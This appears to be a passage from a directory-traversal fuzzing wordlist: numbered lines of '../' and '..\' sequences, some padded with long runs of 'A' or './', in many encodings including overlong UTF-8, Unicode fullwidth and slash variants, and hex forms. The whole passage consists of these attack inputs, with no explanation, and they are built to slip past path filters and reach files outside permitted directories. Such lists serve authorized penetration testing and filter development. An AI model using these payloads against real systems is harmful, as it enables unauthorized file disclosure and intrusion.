300 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../
301 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../
302 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../
303 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\
304 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\
305 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\
306 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\
307 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\
308 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\
309 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\
310 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\
311 | .../
312 | .../.../
313 | .../.../.../
314 | .../.../.../.../
315 | .../.../.../.../.../
316 | .../.../.../.../.../.../
317 | .../.../.../.../.../.../.../
318 | .../.../.../.../.../.../.../.../
319 | ...\
320 | ...\...\
321 | ...\...\...\
322 | ...\...\...\...\
323 | ...\...\...\...\...\
324 | ...\...\...\...\...\...\
325 | ...\...\...\...\...\...\...\
326 | ...\...\...\...\...\...\...\...\
327 | ..../
328 | ..../..../
329 | ..../..../..../
330 | ..../..../..../..../
331 | ..../..../..../..../..../
332 | ..../..../..../..../..../..../
333 | ..../..../..../..../..../..../..../
334 | ..../..../..../..../..../..../..../..../
335 | ....\
336 | ....\....\
337 | ....\....\....\
338 | ....\....\....\....\
339 | ....\....\....\....\....\
340 | ....\....\....\....\....\....\
341 | ....\....\....\....\....\....\....\
342 | ....\....\....\....\....\....\....\....\
343 | ........................................................................../
344 | ........................................................................../../
345 | ........................................................................../../../
346 | ........................................................................../../../../
347 | ........................................................................../../../../../
348 | ........................................................................../../../../../../
349 | ........................................................................../../../../../../../
350 | ........................................................................../../../../../../../../
351 | ..........................................................................\
352 | ..........................................................................\..\
353 | ..........................................................................\..\..\
354 | ..........................................................................\..\..\..\
355 | ..........................................................................\..\..\..\..\
356 | ..........................................................................\..\..\..\..\..\
357 | ..........................................................................\..\..\..\..\..\..\
358 | ..........................................................................\..\..\..\..\..\..\..\
359 | ..%u2215
360 | ..%u2215..%u2215
361 | ..%u2215..%u2215..%u2215
362 | ..%u2215..%u2215..%u2215..%u2215
363 | ..%u2215..%u2215..%u2215..%u2215..%u2215
364 | ..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215
365 | ..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215
366 | ..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215
367 | %uff0e%uff0e/
368 | %uff0e%uff0e/%uff0e%uff0e/
369 | %uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/
370 | %uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/
371 | %uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/
372 | %uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/
373 | %uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/
374 | %uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/
375 | %uff0e%uff0e%u2215
376 | %uff0e%uff0e%u2215%uff0e%uff0e%u2215
377 | %uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
378 | %uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
379 | %uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
380 | %uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
381 | %uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
382 | %uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
383 | ..%u2216
384 | ..%u2216..%u2216
385 | ..%u2216..%u2216..%u2216
386 | ..%u2216..%u2216..%u2216..%u2216
387 | ..%u2216..%u2216..%u2216..%u2216..%u2216
388 | ..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216
389 | ..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216
390 | ..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216
391 | ..%uEFC8
392 | ..%uEFC8..%uEFC8
393 | ..%uEFC8..%uEFC8..%uEFC8
394 | ..%uEFC8..%uEFC8..%uEFC8..%uEFC8
395 | ..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8
396 | ..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8
397 | ..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8
398 | ..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8
399 | ..%uF025
400 | ..%uF025..%uF025
401 | ..%uF025..%uF025..%uF025
402 | ..%uF025..%uF025..%uF025..%uF025
403 | ..%uF025..%uF025..%uF025..%uF025..%uF025
404 | ..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025
405 | ..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025
406 | ..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025
407 | %uff0e%uff0e\
408 | %uff0e%uff0e\%uff0e%uff0e\
409 | %uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\
410 | %uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\
411 | %uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\
412 | %uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\
413 | %uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\
414 | %uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\
415 | %uff0e%uff0e%u2216
416 | %uff0e%uff0e%u2216%uff0e%uff0e%u2216
417 | %uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216
418 | %uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216
419 | %uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216
420 | %uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216
421 | %uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216
422 | %uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216
423 | ..0x2f
424 | ..0x2f..0x2f
425 | ..0x2f..0x2f..0x2f
426 | ..0x2f..0x2f..0x2f..0x2f
427 | ..0x2f..0x2f..0x2f..0x2f..0x2f
428 | ..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f
429 | ..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f
430 | ..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f
431 | 0x2e0x2e/
432 | 0x2e0x2e/0x2e0x2e/
433 | 0x2e0x2e/0x2e0x2e/0x2e0x2e/
434 | 0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/
435 | 0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/
436 | 0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/
437 | 0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/
438 | 0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/
439 | 0x2e0x2e0x2f
440 | 0x2e0x2e0x2f0x2e0x2e0x2f
441 | 0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f
442 | 0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f
443 | 0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f
444 | 0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f
445 | 0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f
446 | 0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f
447 | ..0x5c
448 | ..0x5c..0x5c
449 | ..0x5c..0x5c..0x5c
450 | ..0x5c..0x5c..0x5c..0x5c
451 | ..0x5c..0x5c..0x5c..0x5c..0x5c
452 | ..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c
453 | ..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c
454 | ..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c
455 | 0x2e0x2e\
456 | 0x2e0x2e\0x2e0x2e\
457 | 0x2e0x2e\0x2e0x2e\0x2e0x2e\
458 | 0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\
459 | 0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\
460 | 0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\
461 | 0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\
462 | 0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\
463 | 0x2e0x2e0x5c
464 | 0x2e0x2e0x5c0x2e0x2e0x5c
465 | 0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c
466 | 0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c
467 | 0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c
468 | 0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c
469 | 0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c
470 | 0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c
471 | ..%c0%2f
472 | ..%c0%2f..%c0%2f
473 | ..%c0%2f..%c0%2f..%c0%2f
474 | ..%c0%2f..%c0%2f..%c0%2f..%c0%2f
475 | ..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f
476 | ..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f
477 | ..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f
478 | ..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f
479 | %c0%2e%c0%2e/
480 | %c0%2e%c0%2e/%c0%2e%c0%2e/
481 | %c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/
482 | %c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/
483 | %c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/
484 | %c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/
485 | %c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/
486 | %c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/
487 | %c0%2e%c0%2e%c0%2f
488 | %c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f
489 | %c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f
490 | %c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f
491 | %c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f
492 | %c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f
493 | %c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f
494 | %c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f
495 | ..%c0%5c
496 | ..%c0%5c..%c0%5c
497 | ..%c0%5c..%c0%5c..%c0%5c
498 | ..%c0%5c..%c0%5c..%c0%5c..%c0%5c
499 | ..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c
500 | ..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c
501 | ..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c
502 | ..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c
503 | %c0%2e%c0%2e\
504 | %c0%2e%c0%2e\%c0%2e%c0%2e\
505 | %c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\
506 | %c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\
507 | %c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\
508 | %c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\
509 | %c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\
510 | %c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\
511 | %c0%2e%c0%2e%c0%5c
512 | %c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c
513 | %c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c
514 | %c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c
515 | %c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c
516 | %c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c
517 | %c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c
518 | %c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c
519 | ////%2e%2e%2f
520 | ////%2e%2e%2f%2e%2e%2f
521 | ////%2e%2e%2f%2e%2e%2f%2e%2e%2f
522 | ////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
523 | ////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
524 | ////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
525 | ////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
526 | ////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
527 | \\\%2e%2e%5c
528 | \\\%2e%2e%5c%2e%2e%5c
529 | \\\%2e%2e%5c%2e%2e%5c%2e%2e%5c
530 | \\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c
531 | \\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c
532 | \\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c
533 | \\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c
534 | \\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c
535 | ..//
536 | ..//..//
537 | ..//..//..//
538 | ..//..//..//..//
539 | ..//..//..//..//..//
540 | ..//..//..//..//..//..//
541 | ..//..//..//..//..//..//..//
542 | ..//..//..//..//..//..//..//..//
543 | ..///
544 | ..///..///
545 | ..///..///..///
546 | ..///..///..///..///
547 | ..///..///..///..///..///
548 | ..///..///..///..///..///..///
549 | ..///..///..///..///..///..///..///
550 | ..///..///..///..///..///..///..///..///
551 | ..\\
552 | ..\\..\\
553 | ..\\..\\..\\
554 | ..\\..\\..\\..\\
555 | ..\\..\\..\\..\\..\\
556 | ..\\..\\..\\..\\..\\..\\
557 | ..\\..\\..\\..\\..\\..\\..\\
558 | ..\\..\\..\\..\\..\\..\\..\\..\\
559 | ..\\\
560 | ..\\\..\\\
561 | ..\\\..\\\..\\\
562 | ..\\\..\\\..\\\..\\\
563 | ..\\\..\\\..\\\..\\\..\\\
564 | ..\\\..\\\..\\\..\\\..\\\..\\\
565 | ..\\\..\\\..\\\..\\\..\\\..\\\..\\\
566 | ..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\
567 | ./\/./
568 | ./\/././\/./
569 | ./\/././\/././\/./
570 | ./\/././\/././\/././\/./
571 | ./\/././\/././\/././\/././\/./
572 | ./\/././\/././\/././\/././\/././\/./
573 | ./\/././\/././\/././\/././\/././\/././\/./
574 | ./\/././\/././\/././\/././\/././\/././\/././\/./
575 | .\/\.\
576 | .\/\.\.\/\.\
577 | .\/\.\.\/\.\.\/\.\
578 | .\/\.\.\/\.\.\/\.\.\/\.\
579 | .\/\.\.\/\.\.\/\.\.\/\.\.\/\.\
580 | .\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\
581 | .\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\
582 | .\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\
583 | ./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../
584 | ./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../
585 | ./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../
586 | ./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../
587 | ./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../
588 | ./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../
589 | ./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../
590 | ./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../
591 | .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\
592 | .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\
593 | .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\
